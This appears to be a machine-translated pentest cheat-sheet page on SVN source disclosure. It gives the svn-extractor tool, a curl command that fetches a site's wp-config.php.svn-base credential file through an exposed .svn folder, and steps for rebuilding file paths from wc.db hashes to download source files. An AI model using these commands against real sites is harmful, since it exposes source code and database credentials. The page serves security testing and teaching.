Subversion


文档摘要

Subversion Subversion(通常缩写为 SVN)是一种集中式版本控制系统 (VCS),在软件开发行业中被广泛使用。Subversion 最初由 CollabNet Inc. 于 2000 年开发,旨在成为 CVS(并发版本系统)的改进版本,凭借其强大性和可靠性,迅速获得了广泛认可。 概要 工具 方法论 参考文献 工具 anantshri/svn-extractor - 一个简单的脚本,可通过网络暴露的 .SVN 文件夹提取所有 Web 资源。 方法论 从 下载 SVN 数据库。

Subversion

Subversion(通常缩写为 SVN)是一种集中式版本控制系统 (VCS),在软件开发行业中被广泛使用。Subversion 最初由 CollabNet Inc. 于 2000 年开发,旨在成为 CVS(并发版本系统)的改进版本,凭借其强大性和可靠性,迅速获得了广泛认可。

概要

工具

  • anantshri/svn-extractor - 一个简单的脚本,可通过网络暴露的 .SVN 文件夹提取所有 Web 资源。

    python svn-extractor.py --url "url with .svn available"

方法论

curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
  1. http://server/path_to_vulnerable_site/.svn/wc.db 下载 SVN 数据库。

    INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
  2. 下载感兴趣的文件:

    • 删除 $sha1$ prefix
    • add .svn-base postfix
    • use first byte from hash as a subdirectory of the pristine/ directory (94 in this case)
    • create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base

参考文献

免责声明
本文件由基于人工智能的机器翻译服务翻译而成。尽管我们力求翻译准确,但请注意,自动翻译可能包含错误或不准确之处。应以原始语言版本的文件为准。对于关键信息,建议使用专业的人工翻译。对于因使用本翻译而产生的任何误解或误读,我们概不负责。


发布者: 作者: 转发
评论区 (0)
U